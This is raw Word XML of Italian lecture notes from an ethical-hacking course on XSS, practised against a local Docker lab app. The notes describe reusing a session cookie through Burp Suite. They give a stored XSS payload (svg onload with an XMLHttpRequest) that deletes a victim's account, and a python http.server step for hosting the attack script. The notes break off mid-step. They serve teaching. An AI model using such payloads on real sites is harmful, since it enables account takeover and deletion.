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B547" w14:textId="350E86BB" w:rsidR="009A60D7" w:rsidRDefault="000616BC">
      <w:r>
        <w:t>Prova di laboratorio: 15 gennaio pomeriggio probabilmente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635EEE86" w14:textId="73D22BE7" w:rsidR="000616BC" w:rsidRDefault="000616BC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000616BC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Continuiamo sugli attacchi client-side XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E090D01" w14:textId="403785B2" w:rsidR="002C5EA0" w:rsidRDefault="002C5EA0" w:rsidP="000616BC">
      <w:r>
        <w:t xml:space="preserve">APP TEMP -&gt; si esegue in locale ad esempio su un ambiente </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7393AE7E" w14:textId="61F1ED02" w:rsidR="002C5EA0" w:rsidRDefault="002C5EA0" w:rsidP="000616BC">
      <w:r>
        <w:t xml:space="preserve">Come si può sfruttare nella vita reale un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, potremmo sfruttarlo sui dati di un utente “vittima” per cancellare ad esempio l’account, se noi fossimo in possesso delle credenziali dell’utente poteremmo cancellare l’account, ma tutto ciò può essere fatto anche solo semplicemente con il cookie di sessione che però è spesso protetto (che sia un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>header</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> “e.g. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DB35FC">
        <w:t>H</w:t>
      </w:r>
      <w:r>
        <w:t>ttp</w:t>
      </w:r>
      <w:r w:rsidR="00DB35FC">
        <w:t>On</w:t>
      </w:r>
      <w:r>
        <w:t>ly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> che disattiva la possibilità a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> di accedere al cookie di sessione).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4972E4E3" w14:textId="7873EDF0" w:rsidR="002C5EA0" w:rsidRDefault="002C5EA0" w:rsidP="000616BC">
      <w:r>
        <w:t>A volte non posso accedere al cookie di sessione, ma potremmo mandare un link all’utente che se lo clicca già da loggato mi invia i suoi dati.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61847C3B" w14:textId="7709488F" w:rsidR="002C5EA0" w:rsidRDefault="002C5EA0" w:rsidP="000616BC">
      <w:r>
        <w:t>L’ESAME IN LABORATORIO SI FARA’ SUL PROPRIO PC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD2B70D" w14:textId="290F7EFD" w:rsidR="002C5EA0" w:rsidRDefault="002C5EA0" w:rsidP="000616BC">
      <w:r w:rsidRPr="002C5EA0">
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C5EA0">
        <w:t>docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C5EA0">
        <w:t xml:space="preserve"> compose build – come primo coma</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ndo, dopo aver creato la pagina </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2FFF5300" w14:textId="3AEA0E68" w:rsidR="002C5EA0" w:rsidRPr="002C5EA0" w:rsidRDefault="002C5EA0" w:rsidP="000616BC">
      <w:r w:rsidRPr="002C5EA0">
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C5EA0">
        <w:t>docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C5EA0">
        <w:t xml:space="preserve"> compose up – per avvia</w:t>
      </w:r>
      <w:r>
        <w:t>rla</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522929F5" w14:textId="27244BB0" w:rsidR="000616BC" w:rsidRDefault="006B105E" w:rsidP="000616BC">
      <w:r>
        <w:t>SULL’APPLICAZIONE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426E6DA0" w14:textId="4EB3A84E" w:rsidR="006B105E" w:rsidRDefault="006B105E" w:rsidP="000616BC">
      <w:r>
        <w:t xml:space="preserve">Non c’ è una </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>form</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> di login, come faccio a loggare?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C010BFF" w14:textId="70C7F545" w:rsidR="006B105E" w:rsidRDefault="006B105E" w:rsidP="000616BC">
      <w:r>
        <w:t xml:space="preserve">Se metto i parametri nel link </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>come .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login?username</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Alice&amp;password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=segaa2mani non funziona perché non c’è la pagina di login.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A9E8D4" w14:textId="4272D329" w:rsidR="006B105E" w:rsidRDefault="006B105E" w:rsidP="000616BC">
      <w:r>
        <w:t xml:space="preserve">Apro </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> suite e faccio la richiesta di login e cambio la richiesta da GET a POST.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0608180E" w14:textId="21C15CB3" w:rsidR="006B105E" w:rsidRDefault="006B105E" w:rsidP="000616BC">
      <w:r>
        <w:t xml:space="preserve">L’app vuole i parametri in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, infatti anche con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Bsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> la GET funzionerebbe ma non prende le credenziali, spesso molte app vogliono </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> o xml.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD1A5DC" w14:textId="63F0685E" w:rsidR="006B105E" w:rsidRDefault="00DB35FC" w:rsidP="000616BC">
      <w:r>
        <w:t>Passando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5213047D" w14:textId="03694087" w:rsidR="00DB35FC" w:rsidRDefault="00DB35FC" w:rsidP="000616BC">
      <w:r>
        <w:tab/>
        <w:t>{“username”: “Alice”, “password”: “ciao</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>”}  -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>&gt; posso anche loggare con un altro account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AE8EB3" w14:textId="0C045319" w:rsidR="00DB35FC" w:rsidRDefault="00DB35FC" w:rsidP="000616BC">
      <w:r>
        <w:t>e di conseguenza bisognerà cambiare il “Content-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” dell’</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>header</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>application</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC6B4D6" w14:textId="0C840E6B" w:rsidR="00DB35FC" w:rsidRDefault="00DB35FC" w:rsidP="000616BC">
      <w:r>
        <w:t>Notiamo che viene generato un cookie che potremmo usare nel browser, andando sulla console del cookie: Storage&gt;&gt;nuovo cookie chiamato “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>connect.sid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” e incollarci nel campo “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” il cookie di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BSuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE4DDEE" w14:textId="6A2637BC" w:rsidR="00DB35FC" w:rsidRDefault="00DB35FC" w:rsidP="000616BC">
      <w:r>
        <w:t>Posso notare che il nome dell’utente viene inserito nella pagina dell’utente il che rende il sito un ottimo candidato per attacchi XSS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711B89D7" w14:textId="1ADDED33" w:rsidR="0021111E" w:rsidRDefault="00DB35FC" w:rsidP="000616BC">
      <w:r>
        <w:t xml:space="preserve">Ci sono tecniche di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fuzzing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> che ci permettono di trovare questi cookie nascosti (tools</w:t>
      </w:r>
      <w:r w:rsidR="0021111E">
        <w:t xml:space="preserve"> di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0021111E">
        <w:t>bruteforce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: FFVF e molti altri, da trovare</w:t>
      </w:r>
      <w:r w:rsidR="0021111E">
        <w:t xml:space="preserve"> -&gt; fanno </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0021111E">
        <w:t>bruteforce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0021111E">
        <w:t xml:space="preserve"> sui dizionari o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0021111E">
        <w:t>fuzzing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0021111E">
        <w:t xml:space="preserve"> con stringhe a caso</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="0021111E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B25BEC" w14:textId="042B6378" w:rsidR="0021111E" w:rsidRDefault="0021111E" w:rsidP="000616BC">
      <w:r w:rsidRPr="0021111E">
        <w:t>Normalmente l’</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0021111E">
        <w:t>header</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0021111E">
        <w:t xml:space="preserve"> Cookie: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0021111E">
        <w:t>connect.sid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0021111E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0021111E">
        <w:t xml:space="preserve">=  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0021111E">
        <w:t>cookie</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0021111E">
        <w:t>_da_inseri</w:t>
      </w:r>
      <w:r>
        <w:t>re</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> suite manca, dobbiamo scriverlo noi. (tutto ciò sta avvenendo nel </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>repeater</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5C6672" w14:textId="1FB9C284" w:rsidR="0021111E" w:rsidRDefault="0021111E" w:rsidP="000616BC">
      <w:r>
        <w:t>Nel caso dell’app abbiamo usato /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>updateDetails</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> per cambiare nome con un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>alert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EE4FBA" w14:textId="416CB20C" w:rsidR="0021111E" w:rsidRDefault="0016422E" w:rsidP="000616BC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0016422E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Pay</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>loads</w:t>
      </w:r>
      <w:r w:rsidRPr="0016422E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AllTheThings</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0016422E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> best </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0016422E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>amico</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0016422E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0016422E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dello</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0016422E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0016422E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>io</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04966B31" w14:textId="77777777" w:rsidR="00D37E8F" w:rsidRDefault="00D37E8F" w:rsidP="000616BC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65712199" w14:textId="77777777" w:rsidR="00D37E8F" w:rsidRDefault="00D37E8F" w:rsidP="000616BC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BCEA2EE" w14:textId="64C41AB6" w:rsidR="00D37E8F" w:rsidRDefault="00D37E8F" w:rsidP="000616BC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>In /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>updateDetails</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usiamo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71010C9D" w14:textId="1CB4BE4B" w:rsidR="00D37E8F" w:rsidRDefault="00D37E8F" w:rsidP="000616BC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{ “</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>name”:”&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">/onload=\” var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(); </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hr.open</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(‘GET’,  ‘/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>authService</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/user/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>delete?name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">=Alice’, true); </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hr.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(); \””</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EE244F" w14:textId="310B1A4A" w:rsidR="00D37E8F" w:rsidRPr="00D37E8F" w:rsidRDefault="00D37E8F" w:rsidP="000616BC">
      <w:r w:rsidRPr="00D37E8F">
        <w:t>Visto che è richiesta u</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">na sessione, bisogna usare XML e una richiesta di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (non posso usare </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>document.location</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> perché è richiesta una sessione).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EE185F" w14:textId="17041C05" w:rsidR="00D37E8F" w:rsidRDefault="00D37E8F" w:rsidP="000616BC">
      <w:r>
        <w:t>Posso usare questo URL:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D37E8F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D37E8F">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D37E8F">
        <w:t>authService</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D37E8F">
        <w:t>/user/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D37E8F">
        <w:t>delete?name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D37E8F">
        <w:t>=Alice’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> perché tanto sa che deve girare su quel contesto, non mi serve specificare la prima parte.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0979DC" w14:textId="548BCAA0" w:rsidR="00D37E8F" w:rsidRDefault="00D37E8F" w:rsidP="000616BC">
      <w:r>
        <w:t>Ma il numero di caratteri del payload supera quello del vincolo, quindi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DB4F9C" w14:textId="29118716" w:rsidR="00D37E8F" w:rsidRDefault="00D37E8F" w:rsidP="00D37E8F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D37E8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Creo uno script </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D37E8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D37E8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D37E8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>var.hr = new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hr.open</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(‘GET’,  ‘/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>authService</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/user/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>delete?name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=Alice’, true)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hr.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66353844" w14:textId="0C837D27" w:rsidR="00BF2802" w:rsidRDefault="00BF2802" w:rsidP="00D37E8F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF2802">
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BF2802">
        <w:t>etical</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BF2802">
        <w:t xml:space="preserve"> hacking si usa c</w:t>
      </w:r>
      <w:r>
        <w:t>reare il server in una cartella “www” in modo tale che nessuno possa accedere alle nostre cose.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AB7F64" w14:textId="44E26548" w:rsidR="00BF2802" w:rsidRDefault="00BF2802" w:rsidP="00D37E8F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">python3- m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -&gt; ospito il server nella cartella, solitamente si ospita sulla macchina attaccante </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F885FD" w14:textId="6F4953DC" w:rsidR="00BF2802" w:rsidRDefault="00BF2802" w:rsidP="00BF2802">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>dopo aver salvato lo script, la richiesta di /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
